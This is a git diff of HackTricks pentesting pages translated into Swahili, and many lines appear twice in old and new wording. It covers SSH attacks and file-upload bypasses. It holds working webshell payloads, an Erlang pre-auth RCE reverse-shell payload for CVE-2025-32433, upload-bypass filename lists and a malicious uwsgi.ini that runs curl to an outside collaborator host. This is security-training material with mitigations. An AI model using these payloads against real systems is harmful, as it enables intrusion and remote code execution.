**sftp** ina amri "**symlink**". Kwa hiyo, ikiwa una **ruhusa za kuandika** katika folda fulani, unaweza kuunda **symlinks** za **folda/faili nyingine**. Kwa kuwa labda ume**zuiliwa** ndani ya chroot, hili **haitakuwa hasa la manufaa** kwako; lakini, ikiwa unaweza **kufikia** **symlink** iliyoundwa kutoka kwa **no-chroot** **huduma** (kwa mfano, ikiwa unaweza kufikia symlink kutoka kwenye mtandao), unaweza **kufungua faili zilizounganishwa kwa symlink kupitia mtandao**.
Kwa mfano, ili kuunda **symlink** kutoka kwa faili mpya **"**_**froot**_**" hadi "**_**/**_**"**:
Kwa mfano, kuunda **symlink** kutoka kwa faili mpya **"**_**froot**_**" hadi "**_**/**_**"**:
```bash
sftp> symlink / froot
```
Ikiwa unaweza kufikia faili "_froot_" kupitia wavuti, utaweza kuorodhesha folda ya mzizi ("/") ya mfumo.
Ikiwa unaweza kufikia faili "_froot_" kupitia wavuti, utaweza kuorodhesha folda ya root ("/") ya mfumo.
### Njia za uthibitishaji
### Mbinu za uthibitishaji
Katika mazingira ya usalama wa juu, ni kawaida kuwezesha tu uthibitishaji wa msingi wa funguo au uthibitishaji wa hatua mbili badala ya uthibitishaji wa msingi wa nenosiri rahisi. Lakini mara nyingi njia za uthibitishaji zenye nguvu zinawezeshwa bila kuzima zile dhaifu. Kesi ya kawaida ni kuwezesha `publickey` kwenye usanidi wa openSSH na kuipanga kama njia ya default lakini bila kuzima `password`. Hivyo kwa kutumia hali ya verbose ya mteja wa SSH, mshambuliaji anaweza kuona kwamba njia dhaifu imewezeshwa:
Katika mazingira yenye usalama wa juu, kawaida ni kuwezesha uthibitishaji unaotegemea funguo pekee au uthibitishaji wa vipengele viwili badala ya uthibitishaji rahisi unaotegemea nywila. Lakini mara nyingi mbinu zenye nguvu zaidi zinawezeshwa bila kuzima zile dhaifu. Mfano wa kawaida ni kuwezesha `publickey` katika usanidi wa openSSH na kuiweka kama njia ya chaguo-msingi lakini kutokuzima `password`. Kwa hivyo kwa kutumia verbose mode ya SSH client mshambuliaji anaweza kuona kwamba njia dhaifu imewezeshwa:
```bash
ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
```
Kwa mfano, ikiwa kikomo cha kushindwa kwa uthibitishaji kimewekwa na hujapata nafasi ya kufikia njia ya nywila, unaweza kutumia chaguo la `PreferredAuthentications` kulazimisha kutumia njia hii.
Kwa mfano, ikiwa authentication failure limit imewekwa na haupati fursa ya kufikia password method, unaweza kutumia chaguo la `PreferredAuthentications` kulazimisha kutumia method hii.
```bash
ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
```
Kukagua usanidi wa seva ya SSH ni muhimu ili kuhakikisha kwamba njia pekee zinazotarajiwa zimeidhinishwa. Kutumia hali ya verbose kwenye mteja kunaweza kusaidia kuona ufanisi wa usanidi.
Mapitio ya usanidi wa SSH server ni muhimu ili kuhakikisha kwamba njia zinazotarajiwa pekee ndizo zimeruhusiwa. Kutumia verbose mode kwenye client kunaweza kusaidia kuona ufanisi wa usanidi.
### Config files
### Faili za usanidi
```bash
ssh_config
sshd_config
@ -283,20 +303,20 @@ id_rsa
## Authentication State-Machine Bypass (Pre-Auth RCE)
Mifumo kadhaa ya seva ya SSH ina kasoro za mantiki katika **mashine ya hali ya uthibitishaji** ambayo inaruhusu mteja kutuma ujumbe wa *protocol ya muunganisho* **kabla** ya uthibitishaji kukamilika. Kwa sababu seva inashindwa kuthibitisha kuwa iko katika hali sahihi, ujumbe hao unashughulikiwa kana kwamba mtumiaji ameidhinishwa kikamilifu, na kusababisha **utendaji wa msimbo usio na uthibitisho** au uundaji wa kikao.
Matoleo kadhaa ya server za SSH yana kasoro za mantiki katika **authentication finite-state machine** zinazomruhusu mteja kutuma ujumbe za *connection-protocol* **kabla** uthibitisho haujakamilika. Kwa sababu server haifanyi uhakiki wa kuwa iko katika hali sahihi, ujumbe hayo yanashughulikiwa kana kwamba mtumiaji ameidhinishwa kabisa, na kusababisha **unauthenticated code execution** au kuunda kikao.
Katika ngazi ya protokali, ujumbe wowote wa SSH wenye _nambari ya ujumbe_ **≥ 80** (0x50) unahusiana na tabaka la *muunganisho* (RFC 4254) na lazima **ukubali tu baada ya uthibitishaji kufanikiwa** (RFC 4252). Ikiwa seva inashughulikia moja ya ujumbe hao wakati bado iko katika hali ya *SSH_AUTHENTICATION*, mshambuliaji anaweza mara moja kuunda channel na kuomba vitendo kama vile utekelezaji wa amri, kuhamasisha bandari, n.k.
Kiwango cha protocol, ujumbe wowote wa SSH wenye _message code_ **≥ 80** (0x50) unahusiana na tabaka la *connection* (RFC 4254) na lazima **ukubaliwe tu baada ya uthibitisho kufanikiwa** (RFC 4252). Ikiwa server itashughulikia mojawapo ya ujumbe huo ilipokuwa bado katika hali ya *SSH_AUTHENTICATION*, mshambuliaji anaweza mara moja kuunda channel na kuomba vitendo kama command execution, port-forwarding, nk.
### Generic Exploitation Steps
1. Establish a TCP connection to the targets SSH port (commonly 22, but other services may expose Erlang/OTP on 2022, 830, 2222…).
2. Craft a raw SSH packet:
1. Tengeneza muunganisho wa TCP kwenye port ya SSH ya lengo (kawaida 22, lakini huduma zingine zinaweza kuonyesha Erlang/OTP kwenye 2022, 830, 2222…).
2. Unda raw SSH packet:
* 4-byte **packet_length** (big-endian)
* 1-byte **message_code** ≥ 80 (e.g. `SSH_MSG_CHANNEL_OPEN` = 90, `SSH_MSG_CHANNEL_REQUEST` = 98)
* Payload that will be understood by the chosen message type
3. Send the packet(s) **before completing any authentication step**.
4. Interact with the server APIs that are now exposed _pre-auth_ (command execution, port forwarding, file-system access, …).
* 1-byte **message_code** ≥ 80 (mf. `SSH_MSG_CHANNEL_OPEN` = 90, `SSH_MSG_CHANNEL_REQUEST` = 98)
* Payload itakayofahamika na aina ya message iliyochaguliwa
3. Tuma packet(s) **kabla ya kumaliza hatua yoyote ya uthibitisho**.
4. Ingiliana na server APIs ambazo sasa zimefunuliwa _pre-auth_ (command execution, port forwarding, file-system access, …).
Python proof-of-concept outline:
Muhtasari wa proof-of-concept wa Python:
```python
import socket, struct
HOST, PORT = '10.10.10.10', 22
@ -308,15 +328,15 @@ pkt = struct.pack('>I', 1) + b'\x5a' # 0x5a = 90
s.sendall(pkt)
# additional CHANNEL_REQUEST packets can follow to run commands
```
Katika mazoezi utahitaji kufanya (au kupuuzia mbali) ubadilishanaji wa funguo kulingana na utekelezaji wa lengo, lakini **hakuna uthibitisho** unaofanywa kamwe.
Katika vitendo utahitaji kufanya (au kupitisha) key-exchange kulingana na utekelezaji wa lengo, lakini **no authentication** haifanyiwi kamwe.
---
### Erlang/OTP `sshd` (CVE-2025-32433)
* **Tofauti zilizokumbwa:** OTP < 27.3.3, 26.2.5.11, 25.3.2.20
* **Sababu ya msingi:** daemoni ya SSH ya asili ya Erlang haitathmini hali ya sasa kabla ya kuita `ssh_connection:handle_msg/2`. Hivyo, pakiti yoyote yenye msimbo wa ujumbe 80-255 inafikia mpangilio wa muunganisho wakati kikao bado kiko katika hali ya *userauth*.
* **Athari:** **utendaji wa msimbo wa mbali usio na uthibitisho** (daemoni kwa kawaida inafanya kazi kama **root** kwenye vifaa vilivyojumuishwa/OT).
* **Affected versions:** OTP < 27.3.3, 26.2.5.11, 25.3.2.20
* **Root cause:** Erlang native SSH daemon haithibitishi hali ya sasa kabla ya kuita `ssh_connection:handle_msg/2`. Kwa hiyo kifurushi chochote chenye message code 80-255 kinawafikia handler wa muunganisho wakati kikao bado kiko katika hali ya *userauth*.
* **Impact:** unauthenticated **remote code execution** (the daemon usually runs as **root** on embedded/OT devices).
Mfano wa mzigo unaozalisha shell ya kurudi iliyounganishwa na channel inayodhibitiwa na mshambuliaji:
Mfano wa payload inayozaa reverse shell bound to the attacker-controlled channel:
```erlang
% open a channel first … then:
execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).").
@ -325,26 +345,28 @@ Blind RCE / out-of-band detection inaweza kufanywa kupitia DNS:
```erlang
execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession
```
Detection & Mitigation:
* Inspect SSH traffic: **ondoa pakiti yoyote yenye nambari ya ujumbe ≥ 80 iliyogunduliwa kabla ya uthibitishaji**.
* Upgrade Erlang/OTP to **27.3.3 / 26.2.5.11 / 25.3.2.20** or newer.
* Restrict exposure of management ports (22/2022/830/2222) hasa kwenye vifaa vya OT.
Utambuzi na Kupunguza:
* Inspect SSH traffic: **drop any packet with message code ≥ 80 observed before authentication**.
* Sasisha Erlang/OTP hadi **27.3.3 / 26.2.5.11 / 25.3.2.20** au toleo jipya zaidi.
* Punguza kuonekana kwa bandari za usimamizi (22/2022/830/2222) hasa kwenye vifaa vya OT.
---
### Other Implementations Affected
* **libssh** 0.6 0.8 (server side) **CVE-2018-10933** inakubali `SSH_MSG_USERAUTH_SUCCESS` isiyo na uthibitisho iliyotumwa na mteja, kwa ufanisi ni kasoro ya mantiki kinyume.
### Utekelezaji Mengine Ulioathirika
* **libssh** 0.6 0.8 (server side) **CVE-2018-10933** inakubali `SSH_MSG_USERAUTH_SUCCESS` isiyothibitishwa iliyotumwa na mteja, kwa maana ni kosa la mantiki la kinyume.
Somoo la kawaida ni kwamba mabadiliko yoyote kutoka kwa mabadiliko ya hali yaliyotolewa na RFC yanaweza kuwa na madhara; unapokagua au kufanyia fuzzing SSH daemons zingatia kwa makini *utekelezaji wa mashine ya hali*.
Mafunzo ya kawaida ni kwamba mabadiliko yoyote kutoka kwa mabadiliko ya hali yanayotakiwa na RFC yanaweza kuwa hatari; wakati ukikagua au ukifanya fuzzing ya SSH daemons zingatia hasa *utekelezaji wa mashine ya hali*.
## References
## Marejeo
- [Unit 42 Erlang/OTP SSH CVE-2025-32433](https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/)
- [SSH hardening guides](https://www.ssh-audit.com/hardening_guides.html)
- [Turgensec SSH hacking guide](https://community.turgensec.com/ssh-hacking-guide)
- [Pentesting Kerberos (88) client setup and troubleshooting](pentesting-kerberos-88/README.md)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
## HackTricks Automatic Commands
## Amri za Otomatiki za HackTricks
```
Protocol_Name: SSH
Port_Number: 22

245
src/pentesting-web/file-upload/README.md
View File

@ -1,13 +1,13 @@
# Upakiaji wa Faili
# Kupakia Faili
{{#include ../../banners/hacktricks-training.md}}
## Mbinu Za Jumla za Upakiaji wa Faili
## Mbinu za Jumla za Kupakia Faili
Nyongeza nyingine muhimu:
Other useful extensions:
- **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, _.inc_, _.hphp_, _.ctp_
- **Working in PHPv8**: _.php_, _.php4_, .php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
- **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
- **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
@ -15,13 +15,13 @@ Nyongeza nyingine muhimu:
- **Perl**: _.pl, .cgi_
- **Erlang Yaws Web Server**: _.yaws_
### Bypass file extensions checks
### Kupita ukaguzi wa nyongeza za faili
1. Ikiwa inatumika, angalia **nyongeza zilizotajwa hapo awali.** Pia zijaribu kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia pia nyongeza zilizotajwa hapo awali):_
1. Ikiwa zinatumika, **angalia** **nyongeza zilizotajwa hapo awali.** Pia zipime kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza nyongeza halali kabla ya** nyongeza ya utekelezaji (tumia pia nyongeza zilizotajwa hapo awali):_
- _file.png.php_
- _file.png.Php5_
3. Jaribu kuongeza **alama maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa tabia zote za **ascii** na **Unicode**. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa awali_)
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa herufi zote za **ASCII** na **Unicode**. (_Kumbuka unaweza pia kujaribu kutumia **nyongeza** zilizotajwa **hapo awali**_)
- _file.php%20_
- _file.php%0a_
- _file.php%00_
@ -31,7 +31,7 @@ Nyongeza nyingine muhimu:
- _file._
- _file.php...._
- _file.pHp5...._
4. Jaribu kupita ulinzi kwa **kufinya extension parser** upande wa server kwa mbinu kama **kuzidisha** extension au **kuongeza data chafu** (byte za **null**) kati ya extensions. _Unaweza pia kutumia **extensions** zilizotajwa awali kutengeneza payload bora._
4. Jaribu kupita vizingiti kwa **kuudanganya extension parser** upande wa server na mbinu kama **kurudia** nyongeza au **kuongeza data zisizohitajika** (byte za **null**) kati ya nyongeza. _Unaweza pia kutumia **nyongeza zilizotajwa hapo awali** kuandaa payload bora._
- _file.png.php_
- _file.png.pHp5_
- _file.php#.png_
@ -40,13 +40,13 @@ Nyongeza nyingine muhimu:
- _file.php%0a.png_
- _file.php%0d%0a.png_
- _file.phpJunk123png_
5. Ongeza **safu nyingine ya extensions** kwa ukaguzi uliopita:
5. Ongeza **tabaka lingine la nyongeza** kwenye ukaguzi uliopita:
- _file.png.jpg.php_
- _file.php%00.png%00.jpg_
6. Jaribu kuweka **extension ya utekelezaji kabla ya extension halali** na uombe kuwa server imepangwa vibaya. (inafaa kutumiwa kwenye misconfigurations ya Apache ambapo chochote chenye extension **.php**, lakini **si lazima kiishie kwa .php**, kitatekeleza code):
6. Jaribu kuweka **nyongeza ya utekelezaji kabla ya nyongeza halali** na uombe server iwe misconfigured. (inafaa kutafuta misconfigurations ya Apache ambapo chochote chenye nyongeza **.php**, hata kama si lazima kinaishie kwa .php, kitaweza kuendesha code):
- _ex: file.php.png_
7. Tumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, herufi kolon ":" itaingizwa baada ya extension iliyoruhusiwa na kabla ya ile iliyoruhusiwa. Kama matokeo, faili tupu yenye extension iliyoruhusiwa itaundwa kwenye server (mfano "file.asax:.jpg"). Faili hii inaweza kuhaririwa baadaye kwa kutumia mbinu nyingine kama kutumia short filename yake. Muundo wa "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hiyo, kuongeza nukta baada ya muundo huu kunaweza kusaidia kupita vikwazo zaidi (.mfano "file.asp::$data.")
8. Jaribu kuvunja mipaka ya jina la faili. Extension halali inakatwa. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
7. Kutumia **NTFS alternate data stream (ADS)** katika **Windows**. Katika kesi hii, tabia ya kolon ":" itaingizwa baada ya nyongeza iliyokatazwa na kabla ya ile inayoruhusiwa. Matokeo yake, faili tupu yenye nyongeza iliyokatazwa itaundwa kwenye server (mfano "file.asax:.jpg”). Faili hii inaweza kuhaririwa baadaye kwa mbinu nyingine kama kutumia jina fupi la faili. Muundo "**::$data**” pia unaweza kutumika kuunda faili zisizo tupu. Kwa hivyo, kuongeza nukta baada ya muundo huu pia inaweza kuwa muhimu kupita vikwazo zaidi (mfano "file.asp::$data.”)
8. Jaribu kuvunja mipaka ya jina la faili. Nyongeza halali inakatika. Na PHP hasidi inabaki. AAA<--SNIP-->AAA.php
```
# Linux maximum 255 bytes
@ -61,11 +61,11 @@ AAA<--SNIP 232 A-->AAA.php.png
#### UniSharp Laravel Filemanager pre-2.9.1 (.php. trailing dot) CVE-2024-21546
Baadhi ya upload handlers hupunguza au kuwa-normalize herufi za dot mwishoni kutoka kwenye jina la faili lililosajiliwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) matoleo kabla ya 2.9.1, unaweza kupita ukaguzi wa extension kwa:
Baadhi ya upload handlers hukata au ku-normalize nukta za mwisho (trailing dot) kutoka kwa jina la faili lililohifadhiwa. Katika UniSharps Laravel Filemanager (unisharp/laravel-filemanager) toleo kabla ya 2.9.1, unaweza kupita ukaguzi wa nyongeza kwa:
- Kutumia MIME ya picha halali na magic header (kwa mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuita faili iliyopakiwa kwa extension ya PHP ikifuatiwa na dot, mfano, `shell.php.`.
- Server huondoa dot ya mwisho na kuhifadhi `shell.php`, ambayo itatekelezwa ikiwa itawekwa kwenye directory inayotumika kwa web (default public storage kama `/storage/files/`).
- Kutumia MIME ya picha halali na magic header (mfano, PNGs `\x89PNG\r\n\x1a\n`).
- Kuiruhusu jina la faili iliyopakuliwa kuwa na nyongeza ya PHP ikifuatiwa na nukta, kwa mfano, `shell.php.`.
- Server hutakata nukta ya mwisho na kuhifadhi `shell.php`, ambayo itaendeshwa ikiwa itakapowekwa katika directory inayotumika kwa web (stora ya umma ya default kama `/storage/files/`).
Minimal PoC (Burp Repeater):
```http
@ -80,65 +80,65 @@ Content-Type: image/png
\x89PNG\r\n\x1a\n<?php system($_GET['cmd']??'id'); ?>
------WebKitFormBoundary--
```
Kisha fikia path iliyohifadhiwa (kawaida katika Laravel + LFM):
Kisha fikia njia iliyohifadhiwa (kawaida katika Laravel + LFM):
```
GET /storage/files/0xdf.php?cmd=id
```
Mitigations:
- Upgrade unisharp/laravel-filemanager to ≥ 2.9.1.
- Lazimisha allowlists kali za server-side na thibitisha tena jina la faili lililohifadhiwa.
- Hudumia uploads kutoka maeneo yasiyo-executable.
- Sasisha unisharp/laravel-filemanager hadi ≥ 2.9.1.
- Tekeleza strict server-side allowlists na thibitisha tena persisted filename.
- Serve uploads kutoka maeneo yasiyo-executable.
### Bypass Content-Type, Magic Number, Compression & Resizing
### Kuepuka Content-Type, Magic Number, Compression & Resizing
- Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
- Bypass **Content-Type** checks kwa kuweka **value** ya **Content-Type** **header** kuwa: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
- Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (ili kudanganya amri ya _file_). Au ingiza shell ndani ya **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` or you could also **introduce the payload directly** in an image:\
`\` au unaweza pia **kuingiza payload moja kwa moja** ndani ya image:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
- If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- Ikiwa **compression inayoletwa kwenye image yako**, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu zilizotangulia hazitatumika. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
- The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- Ukurasa wa wavuti pia unaweza kuwa unafanyia **resizing** image, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
- Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- Mbinu nyingine ya kutengeneza payload inayestahimili image resizing, kwa kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayestahimili compression.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
### Other Tricks to check
### Mbinu Nyingine za Kuangalia
- Pata udhaifu wa **rename** faili iliyopakiwa (kubadilisha extension).
- Pata udhaifu wa **Local File Inclusion** ili kutekeleza backdoor.
- Tafuta udhaifu wa kubadilisha jina la faili iliyopakuliwa tayari (ili kubadilisha extension).
- Tafuta Local File Inclusion vulnerability ili kutekeleza backdoor.
- **Possible Information disclosure**:
1. Pakia faili ile ile **mara nyingi** (na kwa **wakati mmoja**) zikiwa na **jina lile lile**.
2. Pakia faili yenye jina la faili au folda ambayo **tayari ipo**.
3. Kupakia faili yenye jina '.' , '..' , au '...' kama jina lake. Kwa mfano, katika Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, faili yenye jina '.' itaunda faili inayoitwa "uploads" katika "/www/" directory.
4. Pakia faili ambayo huenda isifutike kwa urahisi kama **'...:.jpg'** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** yenye **invalid characters** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili katika **Windows** ukitumia majina yaliyohifadhiwa (forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia **executable** (.exe) au **.html** (inayoshindikana kuwa hatari) ambayo ita- execute code wakati mwathiriwa atakapoifunua kwa bahati mbaya.
1. Pakia **mara kadhaa** (na kwa **wakati mmoja**) **faili ile ile** yenye **jina moja**
2. Pakia faili yenye **jina** la **file** au **folder** ambalo **tayari lipo**
3. Kupakia faili yenye majina ya `"." , "..", or "…"` kama jina lake. Kwa mfano, kwenye Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, jina la faili "." litaunda faili liitwalo "uploads" katika directory "/www/".
4. Pakia faili ambayo inaweza isiwe rahisi kufutwa kama **"…:.jpg"** kwenye **NTFS**. (Windows)
5. Pakia faili kwenye **Windows** yenye **invalid characters** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili kwenye **Windows** ukitumia **reserved** (**forbidden**) **names** kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia an executable (.exe) au `.html` (inayoonekana isiyoshtua) ambayo itatekeleza code inapofunguliwa kwa bahati mbaya na mwanaathiriwa.
### Special extension tricks
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
Ikiwa unajaribu kupakia faili kwenye **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/php-tricks-esp/index.html#code-execution).\
Ikiwa unajaribu kupakia faili kwenye **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...)
Faili za `.phar` ni kama `.jar` kwa java, lakini kwa php, na zinaweza **kutumika kama php file** (kuzitekeleza kwa php, au kuzijumlisha ndani ya script...)
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
Extension ya `.inc` mara nyingi hutumika kwa php files zinazotumika tu **kuimport files**, hivyo, wakati fulani, mtu anaweza kuruhusu **extension hii itekelezwe**.
## **Jetty RCE**
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
Ikiwa unaweza kupakia faili ya XML kwenye Jetty server unaweza kupata [RCE because **new *.xml and *.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hivyo, kama inavyoonyeshwa kwenye picha ifuatayo, pakia faili ya XML kwenye `$JETTY_BASE/webapps/` na tarajia shell!
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
## **uWSGI RCE**
For a detailed exploration of this vulnerability check the original research: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Kwa uchambuzi wa kina wa udhaifu huyu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the `.ini` configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as `@(filename)`, is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a `.ini` configuration file is processed.
Udhaifu za Remote Command Execution (RCE) zinaweza kutumika kwenye uWSGI servers ikiwa mtu ana uwezo wa kubadilisha `.ini` configuration file. uWSGI configuration files hutegemea syntax maalum kujumuisha "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imeundwa kujumuisha yaliyomo ya file. Miongoni mwa schemes mbalimbali zinazotambuliwa na uWSGI, scheme ya "exec" ni hasa yenye nguvu, ikiruhusu kusoma data kutoka standard output ya mchakato. Kipengele hiki kinaweza kutumiwa kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati `.ini` configuration file inapototolewa.
Consider the following example of a harmful `uwsgi.ini` file, showcasing various schemes:
Tafakari mfano ufuatao wa hatari wa `uwsgi.ini` file, unaoonyesha schemes mbalimbali:
```ini
[uwsgi]
; read from a symbol
@ -156,15 +156,54 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
Utekelezaji wa payload hutokea wakati wa kuchanganua faili ya usanidi. Ili usanidi uanze na uchanganywe, mchakato wa uWSGI lazima uanzishwe upya (potentially after a crash or due to a Denial of Service attack) au faili lazima iwe imewekwa kwenye auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, hurudisha faili kwa vipindi vilivyowekwa baada ya kugundua mabadiliko.
Utekelezaji wa payload hufanyika wakati faili ya usanidi inachanganuliwa. Ili usanidi uanze kutumika na kuchanganuliwa, mchakato wa uWSGI lazima uanzishwe upya (kwa mfano baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa ku-auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinapakia tena faili kwa vipindi vilivyobainishwa linapogundua mabadiliko.
Ni muhimu kuelewa upole wa jinsi uWSGI inavyochanganua faili za usanidi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), hivyo kupanua zaidi wigo la uwezekano wa matumizi mabaya.
Ni muhimu kuelewa jinsi uchanganaji wa faili za usanidi za uWSGI unavyokuwa mwepesi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama picha au PDF), jambo linalopanua zaidi wigo wa potential exploitation.
## **wget Kupakia Faili/SSRF Triki**
### Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)
Katika baadhi ya matukio unaweza kugundua kwamba server inatumia **`wget`** kupakua **mafayili** na unaweza **kutaja** **URL**. Katika kesi hizi, code inaweza kukagua kwamba extension ya mafaili yaliyopakuliwa iko kwenye whitelist ili kuhakikisha kwamba mafaili yanayoruhusiwa pekee ndio yatakapopakuliwa. Hata hivyo, **ukaguzi huu unaweza kupitishwa.**\
Endpoint isiyothibitishwa katika Gibbon LMS inaruhusu uandishi wa faili kwa makusudi ndani ya web root, ikisababisha pre-auth RCE kwa kuacha faili ya PHP. Toleo zilizoathirika: hadi na pamoja na 25.0.01.
